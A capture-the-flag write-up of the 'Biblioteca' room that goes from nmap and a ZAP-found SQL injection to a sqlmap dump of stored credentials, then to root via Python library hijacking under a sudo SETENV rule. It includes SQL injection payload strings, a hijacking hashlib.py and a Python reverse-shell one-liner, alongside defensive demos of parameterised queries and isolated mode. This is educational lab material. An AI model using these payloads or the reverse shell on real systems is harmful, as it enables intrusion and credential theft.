# Biblioteca

## Nmap

```
sudo nmap 10.10.198.83 -p- -sS -sV       

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Starting with port 8000, which is running Werkzeug 2.0.2 (the WSGI toolkit underneath Flask). Looking up the version number on `searchsploit` shows no public exploits.

The root page of the web server shows us a login page.

![](/files/IzHYkJKLhh3pV39N57Tw)

Using the link at the bottom of the page we move over to a registration form. Signing up with an account is successful.

![](/files/o92KtNUseyqY2UdTheqJ)

We are then able to login with our newly created account.

![](/files/0sJ1zTPnhVjEYhw3BWIH)

From here, however, I was unable to enumerate any further files or directories. After exhaustive directory searches I started ZAP Proxy instead. Using the active scan feature, ZAP flags a SQL injection on the login page.

First we save the raw login request from ZAP to the attacking machine.

![](/files/u7VGgURpBU10Dg8zil5j)

Then we feed it to `sqlmap` as shown below.

```bash
sqlmap -r request.raw --batch -D website -T users --dump
```

With the database and table names in hand (`--dbs` and `--tables` enumerate them if they are not already known), dumping the `users` table of the `website` database reveals stored credentials for the user smokey.

![](/files/riaQYxwFMdOVHvBXDjMC)
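The page shows the injection only through ZAP's finding and the sqlmap dump; the application's own source is not on the page. As an added illustration (not the challenge's code), the following builds a throwaway SQLite database with a made-up `users` row and contrasts a login check that pastes the form fields into the SQL text with one that binds them as parameters. The three payloads are the kinds of probe an active scanner or sqlmap sends: a tautology to bypass the check, a comment to drop the password clause, and a `UNION` that reads another column, which is the same mechanism `--dump` relies on.

```python
import sqlite3

# Constructed stand-in for the target's "website" database and "users" table.
# The credential is made up; it is not the value dumped in the write-up.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('smokey', 'example-password')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Hypothetical login check in the style that produces the bug ZAP flagged:
    the form fields are interpolated straight into the SQL text."""
    query = (
        f"SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same check with bound parameters: the driver never lets input become SQL."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads of the kind an active scanner or sqlmap will try against the username field.
BYPASS = "' OR 1=1 -- "                              # tautology: log in as the first user
COMMENT_OUT = "smokey' -- "                         # comment away the password clause
EXFIL = "' UNION SELECT password FROM users -- "    # read a different column, as --dump does


def demo():
    """Return (vulnerable result, parameterised result) for a legitimate login and each payload."""
    con = make_db()
    return {
        "legit": (login_vulnerable(con, "smokey", "example-password"),
                  login_safe(con, "smokey", "example-password")),
        "bypass": (login_vulnerable(con, BYPASS, "x"), login_safe(con, BYPASS, "x")),
        "comment_out": (login_vulnerable(con, COMMENT_OUT, "x"), login_safe(con, COMMENT_OUT, "x")),
        "exfil": (login_vulnerable(con, EXFIL, "x"), login_safe(con, EXFIL, "x")),
    }


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:12} vulnerable -> {vuln!r:22} parameterised -> {safe!r}")
```

The parameterised version accepts the same legitimate login and returns nothing for every payload, because the quote and `--` arrive as data rather than as SQL syntax. The `UNION` case is worth noting: once a scanner confirms the injection, sqlmap pulls whole tables through exactly that kind of rewritten query, which is how the `users` rows above were obtained.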

With these credentials we are able to log in over SSH.

```bash
ssh smokey@<IP>
```

![](/files/iwlGVqUb5S5lUgxTRLfm)

Viewing the home directories we notice the presence of the user *hazel*. We also find that we can `su` to hazel using her username as the password, and the same credentials work over SSH.

![](/files/Z3sUpm9PegFLc1410J34)

Checking `sudo -l` we notice that we are able to run `/home/hazel/hasher.py` with the python3 binary as root, without supplying a password. Interestingly, the `SETENV:` tag on the rule means sudo lets us set environment variables for that command, including `PYTHONPATH`, which sudo's default `env_reset` handling would otherwise strip.

![](/files/3CHuTFdWoTHQPVF6hkmP)

The exploit method here is known as "Python library hijacking". I have linked a well written article below, which serves as the basis for the exploit path on this page.

**URL** <https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8>

Essentially, `SETENV:` lets our `PYTHONPATH` survive into the root process, and `PYTHONPATH` entries are placed ahead of the standard library on `sys.path`, so they decide where Python looks first when importing a module.

Reading the contents of `hasher.py` we see the script imports the module hashlib. We can create a Python file called `hashlib.py` in `/tmp` that runs our payload. Then, when we run the sudo command with `PYTHONPATH=/tmp`, Python searches `/tmp` before the standard library when resolving the `import hashlib` in `hasher.py`, so our file is executed as root instead of the real module.

Create a new `hashlib.py` file in `/tmp` with the following contents.

```python
import os
os.system("whoami")  # runs when hasher.py imports "hashlib"; prints root if the hijack works
```

Then test it:

```bash
sudo PYTHONPATH=/tmp /usr/bin/python3 /home/hazel/hasher.py
```

![](/files/y5jnUtuCArfdCi8CJCJL)

With root execution confirmed, we replace the contents of `/tmp/hashlib.py` with a Python reverse shell and catch it on our attacking system with a `netcat` listener.

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```

![](/files/0s15OzUmySv6CMgNht7S)
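To see the resolution order the hijack depends on, and the one interpreter flag that defeats it, here is an added example that is not part of the write-up. It plants an inert `hashlib.py` in a temporary directory (standing in for `/tmp/hashlib.py`; the payload is replaced by a marker), then starts a fresh interpreter with `PYTHONPATH` pointing at that directory and asks a one-line probe (a stand-in for `hasher.py`, whose contents are not shown on the page) which file `import hashlib` actually loaded. It repeats the run with `-I`, Python's isolated mode, which ignores `PYTHONPATH` the way `-E` does. The probe string and the marker module are assumptions of the example.

```python
import os
import subprocess
import sys
import tempfile

# Stand-in for hasher.py: it imports hashlib the same way and reports which
# file the name resolved to. The real script's contents are not on the page.
PROBE = "import hashlib; print(hashlib.__file__)"

# Inert stand-in for the attacker's /tmp/hashlib.py. The write-up's payload is
# os.system("whoami") and later a reverse shell; here the module only marks itself.
FAKE_MODULE = "# attacker-controlled shadow of the stdlib module\nHIJACKED = True\n"


def resolve_hashlib(pythonpath_dir, isolated=False):
    """Start a fresh interpreter with PYTHONPATH=pythonpath_dir and return the
    file hashlib was imported from. isolated=True adds -I, which makes Python
    ignore PYTHONPATH (and the script directory), so the stdlib copy wins."""
    env = dict(os.environ, PYTHONPATH=pythonpath_dir)
    cmd = [sys.executable] + (["-I"] if isolated else []) + ["-c", PROBE]
    proc = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def demo():
    """Plant a fake hashlib.py and report whether it won module resolution
    with a plain interpreter and with an isolated (-I) one."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "hashlib.py")
        with open(fake, "w") as f:
            f.write(FAKE_MODULE)
        normal = resolve_hashlib(d)
        hardened = resolve_hashlib(d, isolated=True)
        return {
            "hijacked": os.path.samefile(normal, fake),          # True: PYTHONPATH shadowed the stdlib
            "hijacked_path": normal,
            "isolated_resists": not os.path.samefile(hardened, fake),  # True: -I loaded the real module
            "isolated_path": hardened,
        }


if __name__ == "__main__":
    r = demo()
    print("with PYTHONPATH     ->", r["hijacked_path"])
    print("with -I (isolated)  ->", r["isolated_path"])
```

The first run prints the path inside the temporary directory: that is exactly what happens to `hasher.py` under `sudo PYTHONPATH=/tmp`, since sudo's `SETENV:` lets the variable through and the stdlib is searched last. The second run prints the real `hashlib.py` from the standard library, which is the check to make when assessing a rule like this one: a sudo entry that invoked `python3 -I` (or `-E`) would not be exploitable through `PYTHONPATH`, and neither would one without `SETENV:`, because sudo strips `PYTHONPATH` by default.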
